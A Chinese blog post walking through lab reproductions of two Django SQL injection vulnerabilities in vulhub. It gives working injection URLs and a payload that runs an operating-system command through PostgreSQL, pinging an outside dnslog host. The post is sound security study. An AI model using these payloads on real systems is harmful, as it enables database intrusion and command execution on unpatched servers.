vulhub复现之django(CVE-2019-14234、CVE-2020-9402)

最新推荐文章于 2023-11-24 15:27:28 发布
最新推荐文章于 2023-11-24 15:27:28 发布
阅读量1.1k 收藏 2
点赞数 3
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42253265/article/details/110522043
版权

vulhub复现之django(CVE-2019-14234、CVE-2020-9402)

背景小故事

公司的人一个个的都去云南参加等保测评考试,剩下我一个小扑街孤苦伶仃地在公司学习,惨的一批(我也想去云南地说)
没办法,自己搭了个vulhub玩玩,学习学习cve漏洞复现

django的漏洞概述

Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。
该漏洞的出现的原因在于Django中JSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。

通过JSONField类获得KeyTransform类并生成sql语句的位置。
其中key_name是可控的字符串,最终生成的语句是

WHERE (field->’[key_name]’) = ‘value’

因此可以进行SQL注入。

在这里插入图片描述

CVE-2019-14234漏洞复现

django环境搭建用的全都是vulhub

在这里插入图片描述在浏览器访问http://ip:8000出现一下页面说明搭建成功
在这里插入图片描述

通过对代码的分析,可以知道如果在你的Django中使用了JSONField并且查询的“键名”可控,就可以进行SQL注入

访问http://ip:8000/admin

输入用户名admin ,密码a123123123

在这里插入图片描述

然后构造URL进行查询,payload:

http://ip:8000/admin/vuln/collection/?detail__a%27b=123

由下图可以清楚地看到我们输入的语句已经被执行了,可以继续注入,构造新的payload
在这里插入图片描述构造的新的payload如下:

http://ip:8000/admin/vuln/collection/?detail__title%27)%3d%271%27 or 1%3d1%2d%2d%20

由于or 1=1永为真,因此应该返回所有结果
在这里插入图片描述结合CVE-2019-9193 PostgreSQL高权限命令执行漏洞(https://blog.csdn.net/blood_pupil/article/details/88795627)构造url进行命令注入,这里主要就是利用PostgreSQL的高权限执行cmd_exec,
使用ceye平台检测是否执行了命令

http://ip:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcopy cmd_exec FROM PROGRAM 'ping dnslog的地址'--%20

在这里插入图片描述过去dnslog看的时候,能够看到有流量经过
在这里插入图片描述

复现环境里的postgresql数据库docker没对外的端口映射,如果开了或者真实环境里,还可以结合msf通过CVE-2019-9193来getshell

漏洞修复

更新到最新版本

CVE-2020-9402漏洞复现

输入ip:8000可以看到
在这里插入图片描述

访问路径不对,提示有admin、vuln、vuln23个页面,存在漏洞的是vuln、vuln2

先访问vlun
在这里插入图片描述
发现啥也没有,要怀疑自己,没错就是这样,下面我们来构造

q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1

,报了语法错误,存在SQL注入
在这里插入图片描述我们访问第二个路径http://your-ip:8000/vuln2发现一串数据,不要管他,同样的问题也在这个页面,
在这里插入图片描述

构造pyload

q=0.05)))%20FROM%20%22VULN_COLLECTION2%22%20%20where%20%20(select%20utl_inaddr.get_host_name((SELECT%20user%20FROM%20DUAL))%20from%20dual)%20is%20not%20null%20%20–

在这里插入图片描述

可见,括号已注入成功,SQL语句查询报错:

修复建议

更新到最新版本

冰羽呐
关注
专栏目录
CVE-2020-9402 —— Django GIS SQL注入漏洞
战神/calmness的博客
12-11 455
介绍 DjangoDjango基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在SQL注入漏洞。攻击者可借助特制的SQL语句利用该漏洞查看、添加、修改或删除数据库中的信息。 SQL注入过程: ...
[ vulhub漏洞复现篇 ] Django JSONField/HStoreField SQL 注入漏洞 CVE-2019-14234
qq_51577576的博客
09-30 2514
[ vulhub漏洞复现篇 ] Django JSONField/HStoreField SQL 注入漏洞 CVE-2019-14234 Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于Django中JSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。
Django GIS SQL注入漏洞CVE-2020-9402
Zeker62的博客
08-25 260
什么是Django Python下有许多款不同的 Web 框架。Django是重量级选手中最有代表性的一位。许多成功的网站和APP都基于DjangoDjango 是一个开放源代码的 Web 应用框架,由 Python 写成。 漏洞复现漏洞需要开发者使用了GIS中聚合查询的功能,用户在oracle的数据库且可控tolerance查询时的键名,在其位置注入SQL语句。 https://git...
vulhub漏洞复现-Django JSONField SQL注入漏洞复现CVE-2019-14234
weixin_43071873的博客
11-30 493
Django JSONField SQL注入漏洞复现CVE-2019-14234漏洞概述: Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于Django中JSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。 通过JSONField类获得KeyTransform类并生成sql语句的位置。 其中key_name是可控的字符串,最
漏洞复现-django-SQL注入】vulfocus/django-cve_2019_14234
10-12 1284
django-SQL注入】参数注入
CVE-2019-14234 Django JSONField SQL注入漏洞
weixin_45260839的博客
06-25 1721
CVE-2019-14234 Django JSONField SQL注入漏洞
CVE-2019-14234 Django JSONField SQL注入漏洞复现
m0_48520508的博客
07-28 2527
0x01简介 Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。 什么是JSONField,Django是一个大而全的Web框架,其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 相比于Mysql,Postgresql支持的数据类型更加丰富,其对JSON格式数据的支持也让这个关系型数据库拥有
[ vulhub漏洞复现篇 ] Django debug page XSS漏洞 CVE-2017-12794
qq_51577576的博客
09-29 1845
[ vulhub漏洞复现篇 ] Django debug page XSS漏洞 CVE-2017-12794 DjangoDjango软件基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。Django1.10.8之前的版本和1.11.5之前的1.11.x版本中的Technical500Template存在安全漏洞,该漏洞源于程序没有正确的过滤用户提交的输入。远程攻击者可利用该漏洞在浏览器中执行任意脚本代码。
[ vulhub漏洞复现篇 ] Django SQL注入漏洞复现 CVE-2021-35042
qq_51577576的博客
09-28 2629
[ vulhub漏洞复现篇 ] Django SQL注入漏洞复现 CVE-2021-35042 Django 组件存在 SQL 注入漏洞,该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不足,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行 SQL 注入攻击,最终造成服务器敏感信息泄露。
vulhubdjango
haoaaao的博客
05-03 2059
0x00 CVE-2017-12794(xss) 1、简介 Django 是一个由 Python 编写的一个开放源代码的 Web 应用框架。 使用 Django,只要很少的代码,Python 的程序开发人员就可以轻松地完成一个正式网站所需要的大部分内容,并进一步开发出全功能的 Web 服务, Django 本身基于 MVC 模型,即 Model(模型)+ View(视图)+ Controller(控制器)设计模式,MVC 模式使后续对程序的修改和扩展简化,并且使程序某一部分的重复利用成为可能。 ———
Django GIS SQL注入漏洞复现CVE-2020-9402
Beret-81的博客
06-17 2241
Django GIS SQL注入漏洞复现漏洞详情漏洞环境漏洞复现 漏洞详情 DjangoDjango基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在SQL注入漏洞。攻击者可借助特制的SQL语句利用该漏洞查看、添加、修改或删除数据库中的信息。 漏洞环境 环境搭建,环境启动后,访问http://your-ip:8000即可看到Dja
Vulhub-django GIS SQL注入漏洞
shayebudon的博客
12-14 1065
首先转到列表视图:http://your-ip:8000/vuln/ 添加?order=-id到 GET 参数。看到按 id 降序排列的数据。 看到按 id 降序排列的数据。 因此根据这个信息我们可以构造报错注入来进行攻击获取数据信息。 ?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23,其中vuln是我们的应用程序和collection模型。 .
CVE-2019-14234漏洞复现(SQL注入)
weixin_71090536的博客
09-23 403
漏洞环境(路径):vulhub / django / CVE-2019-14234。1. 首先,使用用户名和密码登录 Django-Admin。用户名密码为:admin / a123123123。即表明此处含有 SQL 注入漏洞。3. 在其 URL 中添加 GET 参数。
Django_JSONField_HStoreField_SQL注入漏洞 CVE-2019-14234 漏洞复现
ADummy的博客
02-22 192
Django JSONField / HStoreField SQL注入漏洞CVE-2019-14234) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>用户创建成功—>成功登录 0x01漏洞介绍 **Django是一个大而全的Web框架,其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。** ​
17 - vulhub - Django GIS SQL注入漏洞CVE-2020-9402
易编橙 · 终身成长社群,相遇已是上上签!
11-10 1718
文章目录漏洞名称:Django GIS SQL注入漏洞CVE-2020-9402)影响版本漏洞原理漏洞复现漏洞利用限制环境准备漏洞利用漏洞漏洞漏洞详细分析修复建议 漏洞名称:Django GIS SQL注入漏洞CVE-2020-9402) 简介: DjangoDjango基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在S
16 - vulhub - Django JSONField/HStoreField SQL注入漏洞CVE-2019-14234
易编橙 · 终身成长社群,相遇已是上上签!
11-03 1186
Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。 什么是JSONField,Django是一个大而全的Web框架,其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 相比于Mysql,Postgresql支持的数据类型更加丰富,其对JSON格式数据的支持也让这个关系型数据库拥有了NoSQ
Oracle SQL 注入上的 Django GIS 函数和聚合漏洞CVE-2020-9402
最新发布
weixin_56537388的博客
11-24 714
Django2020年3 月4日发布了一个安全更新,修复了 GIS 函数和聚合中的 SQL 注入漏洞。该漏洞要求开发者使用 JSONField/HStoreField;此外,还可以控制 QuerySet 的字段名称。Django 的内置应用程序 Django-Admin 受到影响,这为我们提供了一种重现漏洞的简单方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值